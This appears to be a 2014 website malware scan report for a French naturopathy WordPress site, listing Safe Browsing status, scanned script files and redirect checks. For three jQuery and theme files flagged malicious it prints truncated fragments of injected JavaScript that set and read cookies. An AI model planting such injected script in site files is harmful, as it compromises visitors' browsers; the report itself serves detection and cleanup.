Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mon-naturopathe.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.mon-naturopathe.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 21 Sep 2014 06:47:24 GMT Location: http://mon-naturopathe.com/ Server: Apache/2.2.14 (Ubuntu) Vary: Cookie,Accept-Encoding Content-Type: text/html; charset=UTF-8 X-Pingback: http://mon-naturopathe.com/xmlrpc.php X-Powered-By: PHP/5.3.2-1ubuntu4.26.1~gandi | clean |
http://mon-naturopathe.com/ | 200 OK Content-Length: 26679 Content-Type: text/html | clean |
http://mon-naturopathe.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96697 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( jQuery.noConflict(); Antivirus reports:
| ||
http://mon-naturopathe.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8090 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( Antivirus reports:
| ||
http://mon-naturopathe.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105 | 200 OK Content-Length: 13003 Content-Type: application/javascript | clean |
http://mon-naturopathe.com/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 1647 Content-Type: application/javascript | clean |
http://mon-naturopathe.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/javascript | clean |
http://mon-naturopathe.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.3 | 200 OK Content-Length: 9658 Content-Type: application/javascript | clean |
http://mon-naturopathe.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4 | 200 OK Content-Length: 7411 Content-Type: application/javascript | clean |
http://mon-naturopathe.com/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-fr.js?ver=2.6.9 | 200 OK Content-Length: 7847 Content-Type: application/javascript | clean |
http://mon-naturopathe.com/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.6.9 | 200 OK Content-Length: 71745 Content-Type: application/javascript | clean |
http://mon-naturopathe.com/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.6.9 | 200 OK Content-Length: 4061 Content-Type: application/javascript | clean |
http://mon-naturopathe.com/wp-content/themes/emerald/js/respond.js?ver=1.0.1 | 200 OK Content-Length: 4106 Content-Type: application/javascript | clean |
http://mon-naturopathe.com/wp-content/themes/emerald/js/jquery.tweet.js | 200 OK Content-Length: 14808 Content-Type: application/javascript | clean |
http://mon-naturopathe.com/wp-content/themes/emerald/js/superfish.js?ver=1.4.8 | 200 OK Content-Length: 4723 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( o.onHide.call($ul); return this; }, showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); Antivirus reports:
| ||
http://mon-naturopathe.com/wp-content/themes/emerald/js/tooltipsy.js | 200 OK Content-Length: 6725 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mon-naturopathe.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Sun, 21 Sep 2014 06:47:24 GMT
Accept-Ranges: bytes
ETag: "8a0ed-6837-5036fd3219580"
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding,Cookie
Content-Length: 26679
Content-Type: text/html; charset=UTF-8
Expires: Sun, 21 Sep 2014 06:47:27 GMT
Last-Modified: Fri, 19 Sep 2014 19:08:22 GMT
...26679 bytes of data.
GET / HTTP/1.1
Host: mon-naturopathe.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Sun, 21 Sep 2014 06:47:24 GMT
Accept-Ranges: bytes
ETag: "8a0ed-6837-5036fd3219580"
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding,Cookie
Content-Length: 26679
Content-Type: text/html; charset=UTF-8
Expires: Sun, 21 Sep 2014 06:47:27 GMT
Last-Modified: Fri, 19 Sep 2014 19:08:22 GMT
...26679 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mon-naturopathe.com
Referer: http://www.google.com/search?q=mon-naturopathe.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mon-naturopathe.com
Referer: http://www.google.com/search?q=mon-naturopathe.com
Result:
The result is similar to the first query. There are no suspicious redirects found.